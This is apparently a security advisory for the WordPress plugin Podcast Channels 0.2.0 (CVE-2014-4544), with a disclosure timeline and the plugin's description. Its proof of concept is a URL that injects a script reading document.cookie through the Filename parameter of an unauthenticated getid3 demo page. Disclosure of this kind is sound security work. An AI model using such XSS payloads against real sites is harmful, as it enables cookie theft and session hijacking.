wp-plugin : podcast-channels

Plugin Details
Plugin Name: wp-plugin : podcast-channels
Effected Version : 0.2.0 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://127.0.0.1/wordpress/wp-content/wp-plugs/podcastchannels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&


Disclosure Timeline
Vendor Contacted : 2014-01-22
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 25, 2014
CVE Number : CVE-2014-4544
Plugin Description :
[| What do you need to podcast with Wordpress? Nothing -- Wordpress puts enclosures in the feed for you. That's the bare bones and it works well enough. But iTunes metadata would be nice. And, how about different info in different categories? Podcast Channels lets you specify iTunes metadata for the home feed, specific category feeds, and even 'user defined' ('Conditional') feeds (see the FAQ). = Setting up Category Channels = Go to the 'Media > Podcast Channels' page to set up the Site Defaults (it's 'Manage > Podcast Channels' for pre-2.7 WP). If you are not happy with the defaults shown in grey, click in the fields to set your own. If you want the main blog page feed to use this data, tick the 'add to Home Feed' option. To add a podcast channel, choose a blog category from the drop-down menu and click 'Add Category Channel'. When the new channel pops up, there is an 'Add field...' drop-down menu in it that lets you specify defaults for this channel that over-ride the site defaults. Leave a field undefined/blank or the same as the default and it will be removed from the channel definition - which means the value reverts to the site default. = Fields that don't inherit = Two fields are channel specific and do not inherit from the site defaults: 'Feed Moving To' is used to tell your podcast users (and the iTunes directory) that the podcast channel is moving to a new URL. 'Feedburner URL' redirects everyone (except the Feedburner site!) to a Feedurner URL so that they can collect stats for you. = Audio Files in the Media Library = When you upload an audio file, Podcast Channels adds 'Artist', 'Duration' and 'Explicit' fields to the Media Library. It initially fills in the artist and duration with the information found in the ID3 tags, but you are free to edit the fields. Remember to set the explicit flag to 'Yes' if the content is not suitable for children. Apple are likely to de-list your podcast from the iTunes directory if you do not. = Copyright and Image = Podcast Channels adds image and copyright info to all your feeds if you specify it in the extra fields in 'Settings > General' (see screenshots). ]